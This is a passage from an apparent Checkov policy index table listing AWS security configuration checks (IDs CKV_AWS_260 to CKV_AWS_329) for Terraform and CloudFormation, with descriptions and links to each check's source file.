[SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | -| 665 | CKV_AWS_260 | resource | AWS::EC2::SecurityGroupIngress | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Cloudformation | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | -| 666 | CKV_AWS_260 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Terraform | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | -| 667 | CKV_AWS_260 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Terraform | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | -| 668 | CKV_AWS_260 | resource | aws_vpc_security_group_ingress_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Terraform | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | -| 669 | CKV_AWS_261 | resource | aws_alb_target_group | Ensure HTTP HTTPS Target group defines Healthcheck | Terraform | [LBTargetGroupsDefinesHealthcheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBTargetGroupsDefinesHealthcheck.py) | -| 670 | CKV_AWS_261 | resource | aws_lb_target_group | Ensure HTTP HTTPS Target group defines Healthcheck | Terraform | [LBTargetGroupsDefinesHealthcheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBTargetGroupsDefinesHealthcheck.py) | -| 671 | CKV_AWS_262 | resource | aws_kendra_index | Ensure Kendra index Server side encryption uses CMK | Terraform | [KendraIndexSSEUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KendraIndexSSEUsesCMK.py) | -| 672 | CKV_AWS_263 | resource | aws_appflow_flow | Ensure AppFlow flow uses CMK | Terraform | [AppFlowUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppFlowUsesCMK.py) | -| 673 | CKV_AWS_264 | resource | aws_appflow_connector_profile | Ensure AppFlow connector profile uses CMK | Terraform | [AppFlowConnectorProfileUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppFlowConnectorProfileUsesCMK.py) | -| 674 | CKV_AWS_265 | resource | aws_keyspaces_table | Ensure Keyspaces Table uses CMK | Terraform | [KeyspacesTableUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KeyspacesTableUsesCMK.py) | -| 675 | CKV_AWS_266 | resource | aws_db_snapshot_copy | Ensure DB Snapshot copy uses CMK | Terraform | [DBSnapshotCopyUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBSnapshotCopyUsesCMK.py) | -| 676 | CKV_AWS_267 | resource | aws_comprehend_entity_recognizer | Ensure that Comprehend Entity Recognizer's model is encrypted by KMS using a customer managed Key (CMK) | Terraform | [ComprehendEntityRecognizerModelUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ComprehendEntityRecognizerModelUsesCMK.py) | -| 677 | CKV_AWS_268 | resource | aws_comprehend_entity_recognizer | Ensure that Comprehend Entity Recognizer's volume is encrypted by KMS using a customer managed Key (CMK) | Terraform | [ComprehendEntityRecognizerVolumeUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ComprehendEntityRecognizerVolumeUsesCMK.py) | -| 678 | CKV_AWS_269 | resource | aws_connect_instance_storage_config | Ensure Connect Instance Kinesis Video Stream Storage Config uses CMK | Terraform | [ConnectInstanceKinesisVideoStreamStorageConfigUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConnectInstanceKinesisVideoStreamStorageConfigUsesCMK.py) | -| 679 | CKV_AWS_270 | resource | aws_connect_instance_storage_config | Ensure Connect Instance S3 Storage Config uses CMK | Terraform | [ConnectInstanceS3StorageConfigUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConnectInstanceS3StorageConfigUsesCMK.py) | -| 680 | CKV_AWS_271 | resource | aws_dynamodb_table_replica | Ensure DynamoDB table replica KMS encryption uses CMK | Terraform | [DynamoDBTableReplicaKMSUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBTableReplicaKMSUsesCMK.py) | -| 681 | CKV_AWS_272 | resource | aws_lambda_function | Ensure AWS Lambda function is configured to validate code-signing | Terraform | [LambdaCodeSigningConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaCodeSigningConfigured.py) | -| 682 | CKV_AWS_273 | resource | aws_iam_user | Ensure access is controlled through SSO and not AWS IAM defined users | Terraform | [IAMUserNotUsedForAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMUserNotUsedForAccess.py) | -| 683 | CKV_AWS_274 | resource | aws_iam_group_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | -| 684 | CKV_AWS_274 | resource | aws_iam_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | -| 685 | CKV_AWS_274 | resource | aws_iam_role | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | -| 686 | CKV_AWS_274 | resource | aws_iam_role_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | -| 687 | CKV_AWS_274 | resource | aws_iam_user_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | -| 688 | CKV_AWS_274 | resource | aws_ssoadmin_managed_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | -| 689 | CKV_AWS_275 | data | aws_iam_policy | Disallow policies from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMManagedAdminPolicy.py) | -| 690 | CKV_AWS_276 | resource | aws_api_gateway_method_settings | Ensure Data Trace is not enabled in API Gateway Method Settings | Terraform | [APIGatewayMethodSettingsDataTrace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsDataTrace.py) | -| 691 | CKV_AWS_277 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1 | Terraform | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py) | -| 692 | CKV_AWS_277 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1 | Terraform | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py) | -| 693 | CKV_AWS_277 | resource | aws_vpc_security_group_ingress_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1 | Terraform | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py) | -| 694 | CKV_AWS_278 | resource | aws_memorydb_snapshot | Ensure MemoryDB snapshot is encrypted by KMS using a customer managed Key (CMK) | Terraform | [MemoryDBSnapshotEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBSnapshotEncryptionWithCMK.py) | -| 695 | CKV_AWS_279 | resource | aws_neptune_cluster_snapshot | Ensure Neptune snapshot is securely encrypted | Terraform | [NeptuneClusterSnapshotEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterSnapshotEncrypted.py) | -| 696 | CKV_AWS_280 | resource | aws_neptune_cluster_snapshot | Ensure Neptune snapshot is encrypted by KMS using a customer managed Key (CMK) | Terraform | [NeptuneClusterSnapshotEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterSnapshotEncryptedWithCMK.py) | -| 697 | CKV_AWS_281 | resource | aws_redshift_snapshot_copy_grant | Ensure RedShift snapshot copy is encrypted by KMS using a customer managed Key (CMK) | Terraform | [RedshiftClusterSnapshotCopyGrantEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterSnapshotCopyGrantEncryptedWithCMK.py) | -| 698 | CKV_AWS_282 | resource | aws_redshiftserverless_namespace | Ensure that Redshift Serverless namespace is encrypted by KMS using a customer managed key (CMK) | Terraform | [RedshiftServerlessNamespaceKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftServerlessNamespaceKMSKey.py) | -| 699 | CKV_AWS_283 | data | aws_iam_policy_document | Ensure no IAM policies documents allow ALL or any AWS principal permissions to the resource | Terraform | [IAMPublicActionsPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPublicActionsPolicy.py) | -| 700 | CKV_AWS_284 | resource | aws_sfn_state_machine | Ensure State Machine has X-Ray tracing enabled | Terraform | [StateMachineXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/StateMachineXray.py) | -| 701 | CKV_AWS_285 | resource | aws_sfn_state_machine | Ensure State Machine has execution history logging enabled | Terraform | [StateMachineLoggingExecutionHistory.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/StateMachineLoggingExecutionHistory.py) | -| 702 | CKV_AWS_286 | resource | aws_iam_group_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) | -| 703 | CKV_AWS_286 | resource | aws_iam_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) | -| 704 | CKV_AWS_286 | resource | aws_iam_role_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) | -| 705 | CKV_AWS_286 | resource | aws_iam_user_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) | -| 706 | CKV_AWS_286 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) | -| 707 | CKV_AWS_287 | resource | aws_iam_group_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) | -| 708 | CKV_AWS_287 | resource | aws_iam_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) | -| 709 | CKV_AWS_287 | resource | aws_iam_role_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) | -| 710 | CKV_AWS_287 | resource | aws_iam_user_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) | -| 711 | CKV_AWS_287 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) | -| 712 | CKV_AWS_288 | resource | aws_iam_group_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) | -| 713 | CKV_AWS_288 | resource | aws_iam_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) | -| 714 | CKV_AWS_288 | resource | aws_iam_role_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) | -| 715 | CKV_AWS_288 | resource | aws_iam_user_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) | -| 716 | CKV_AWS_288 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) | -| 717 | CKV_AWS_289 | resource | aws_iam_group_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) | -| 718 | CKV_AWS_289 | resource | aws_iam_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) | -| 719 | CKV_AWS_289 | resource | aws_iam_role_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) | -| 720 | CKV_AWS_289 | resource | aws_iam_user_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) | -| 721 | CKV_AWS_289 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) | -| 722 | CKV_AWS_290 | resource | aws_iam_group_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) | -| 723 | CKV_AWS_290 | resource | aws_iam_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) | -| 724 | CKV_AWS_290 | resource | aws_iam_role_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) | -| 725 | CKV_AWS_290 | resource | aws_iam_user_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) | -| 726 | CKV_AWS_290 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) | -| 727 | CKV_AWS_291 | resource | AWS::MSK::Cluster | Ensure MSK nodes are private | Cloudformation | [MSKClusterNodesArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MSKClusterNodesArePrivate.py) | -| 728 | CKV_AWS_291 | resource | aws_msk_cluster | Ensure MSK nodes are private | Terraform | [MSKClusterNodesArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterNodesArePrivate.py) | -| 729 | CKV_AWS_292 | resource | aws_docdb_global_cluster | Ensure DocumentDB Global Cluster is encrypted at rest (default is unencrypted) | Terraform | [DocDBGlobalClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBGlobalClusterEncryption.py) | -| 730 | CKV_AWS_293 | resource | aws_db_instance | Ensure that AWS database instances have deletion protection enabled | Terraform | [RDSInstanceDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstanceDeletionProtection.py) | -| 731 | CKV_AWS_294 | resource | aws_cloudtrail_event_data_store | Ensure CloudTrail Event Data Store uses CMK | Terraform | [CloudtrailEventDataStoreUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEventDataStoreUsesCMK.py) | -| 732 | CKV_AWS_295 | resource | aws_datasync_location_object_storage | Ensure DataSync Location Object Storage doesn't expose secrets | Terraform | [DatasyncLocationExposesSecrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DatasyncLocationExposesSecrets.py) | -| 733 | CKV_AWS_296 | resource | aws_dms_endpoint | Ensure DMS endpoint uses Customer Managed Key (CMK) | Terraform | [DMSEndpointUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSEndpointUsesCMK.py) | -| 734 | CKV_AWS_297 | resource | aws_scheduler_schedule | Ensure EventBridge Scheduler Schedule uses Customer Managed Key (CMK) | Terraform | [SchedulerScheduleUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SchedulerScheduleUsesCMK.py) | -| 735 | CKV_AWS_298 | resource | aws_dms_s3_endpoint | Ensure DMS S3 uses Customer Managed Key (CMK) | Terraform | [DMSS3UsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSS3UsesCMK.py) | -| 736 | CKV_AWS_300 | resource | aws_s3_bucket_lifecycle_configuration | Ensure S3 lifecycle configuration sets period for aborting failed uploads | Terraform | [S3AbortIncompleteUploads.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AbortIncompleteUploads.py) | -| 737 | CKV_AWS_301 | resource | aws_lambda_permission | Ensure that AWS Lambda function is not publicly accessible | Terraform | [LambdaFunctionIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionIsNotPublic.py) | -| 738 | CKV_AWS_302 | resource | aws_db_snapshot | Ensure DB Snapshots are not Public | Terraform | [DBSnapshotsArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBSnapshotsArePrivate.py) | -| 739 | CKV_AWS_303 | resource | aws_ssm_document | Ensure SSM documents are not Public | Terraform | [SSMDocumentsArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMDocumentsArePrivate.py) | -| 740 | CKV_AWS_304 | resource | aws_secretsmanager_secret_rotation | Ensure Secrets Manager secrets should be rotated within 90 days | Terraform | [SecretManagerSecret90days.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecretManagerSecret90days.py) | -| 741 | CKV_AWS_305 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution has a default root object configured | Terraform | [CloudfrontDistributionDefaultRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionDefaultRoot.py) | -| 742 | CKV_AWS_306 | resource | aws_sagemaker_notebook_instance | Ensure SageMaker notebook instances should be launched into a custom VPC | Terraform | [SagemakerNotebookInCustomVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookInCustomVPC.py) | -| 743 | CKV_AWS_307 | resource | aws_sagemaker_notebook_instance | Ensure SageMaker Users should not have root access to SageMaker notebook instances | Terraform | [SagemakerNotebookRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookRoot.py) | -| 744 | CKV_AWS_308 | resource | aws_api_gateway_method_settings | Ensure API Gateway method setting caching is set to encrypted | Terraform | [APIGatewayMethodSettingsCacheEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsCacheEncrypted.py) | -| 745 | CKV_AWS_309 | resource | aws_apigatewayv2_route | Ensure API GatewayV2 routes specify an authorization type | Terraform | [APIGatewayV2RouteDefinesAuthorizationType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayV2RouteDefinesAuthorizationType.py) | -| 746 | CKV_AWS_310 | resource | aws_cloudfront_distribution | Ensure CloudFront distributions should have origin failover configured | Terraform | [CloudfrontDistributionOriginFailover.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionOriginFailover.py) | -| 747 | CKV_AWS_311 | resource | aws_codebuild_project | Ensure that CodeBuild S3 logs are encrypted | Terraform | [CodebuildS3LogsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildS3LogsEncrypted.py) | -| 748 | CKV_AWS_312 | resource | aws_elastic_beanstalk_environment | Ensure Elastic Beanstalk environments have enhanced health reporting enabled | Terraform | [ElasticBeanstalkUseEnhancedHealthChecks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticBeanstalkUseEnhancedHealthChecks.py) | -| 749 | CKV_AWS_313 | resource | aws_rds_cluster | Ensure RDS cluster configured to copy tags to snapshots | Terraform | [RDSClusterCopyTags.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterCopyTags.py) | -| 750 | CKV_AWS_314 | resource | aws_codebuild_project | Ensure CodeBuild project environments have a logging configuration | Terraform | [CodebuildHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildHasLogs.py) | -| 751 | CKV_AWS_315 | resource | aws_autoscaling_group | Ensure EC2 Auto Scaling groups use EC2 launch templates | Terraform | [AutoScalingLaunchTemplate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AutoScalingLaunchTemplate.py) | -| 752 | CKV_AWS_316 | resource | aws_codebuild_project | Ensure CodeBuild project environments do not have privileged mode enabled | Terraform | [CodeBuildPrivilegedMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeBuildPrivilegedMode.py) | -| 753 | CKV_AWS_317 | resource | AWS::Elasticsearch::Domain | Ensure Elasticsearch Domain Audit Logging is enabled | Cloudformation | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | -| 754 | CKV_AWS_317 | resource | AWS::OpenSearchService::Domain | Ensure Elasticsearch Domain Audit Logging is enabled | Cloudformation | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | -| 755 | CKV_AWS_317 | resource | aws_elasticsearch_domain | Ensure Elasticsearch Domain Audit Logging is enabled | Terraform | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | -| 756 | CKV_AWS_317 | resource | aws_opensearch_domain | Ensure Elasticsearch Domain Audit Logging is enabled | Terraform | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | -| 757 | CKV_AWS_318 | resource | aws_elasticsearch_domain | Ensure Elasticsearch domains are configured with at least three dedicated master nodes for HA | Terraform | [ElasticsearchDomainHA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainHA.py) | -| 758 | CKV_AWS_318 | resource | aws_opensearch_domain | Ensure Elasticsearch domains are configured with at least three dedicated master nodes for HA | Terraform | [ElasticsearchDomainHA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainHA.py) | -| 759 | CKV_AWS_319 | resource | aws_cloudwatch_metric_alarm | Ensure that CloudWatch alarm actions are enabled | Terraform | [CloudWatchAlarmsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchAlarmsEnabled.py) | -| 760 | CKV_AWS_320 | resource | aws_redshift_cluster | Ensure Redshift clusters do not use the default database name | Terraform | [RedshiftClusterDatabaseName.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterDatabaseName.py) | -| 761 | CKV_AWS_321 | resource | aws_redshift_cluster | Ensure Redshift clusters use enhanced VPC routing | Terraform | [RedshiftClusterUseEnhancedVPCRouting.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterUseEnhancedVPCRouting.py) | -| 762 | CKV_AWS_322 | resource | aws_elasticache_cluster | Ensure ElastiCache for Redis cache clusters have auto minor version upgrades enabled | Terraform | [ElasticCacheAutomaticMinorUpgrades.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticCacheAutomaticMinorUpgrades.py) | -| 763 | CKV_AWS_323 | resource | aws_elasticache_cluster | Ensure ElastiCache clusters do not use the default subnet group | Terraform | [ElastiCacheHasCustomSubnet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElastiCacheHasCustomSubnet.py) | -| 764 | CKV_AWS_324 | resource | aws_rds_cluster | Ensure that RDS Cluster log capture is enabled | Terraform | [RDSClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterLogging.py) | -| 765 | CKV_AWS_325 | resource | aws_rds_cluster | Ensure that RDS Cluster audit logging is enabled for MySQL engine | Terraform | [RDSClusterAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterAuditLogging.py) | -| 766 | CKV_AWS_326 | resource | aws_rds_cluster | Ensure that RDS Aurora Clusters have backtracking enabled | Terraform | [RDSClusterAuroraBacktrack.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterAuroraBacktrack.py) | -| 767 | CKV_AWS_327 | resource | aws_rds_cluster | Ensure RDS Clusters are encrypted using KMS CMKs | Terraform | [RDSClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterEncryptedWithCMK.py) | -| 768 | CKV_AWS_328 | resource | aws_alb | Ensure that ALB is configured with defensive or strictest desync mitigation mode | Terraform | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py) | -| 769 | CKV_AWS_328 | resource | aws_elb | Ensure that ALB is configured with defensive or strictest desync mitigation mode | Terraform | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py) | -| 770 | CKV_AWS_328 | resource | aws_lb | Ensure that ALB is configured with defensive or strictest desync mitigation mode | Terraform | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py) | -| 771 | CKV_AWS_329 | resource | aws_efs_access_point | EFS access points should enforce a root directory | Terraform | 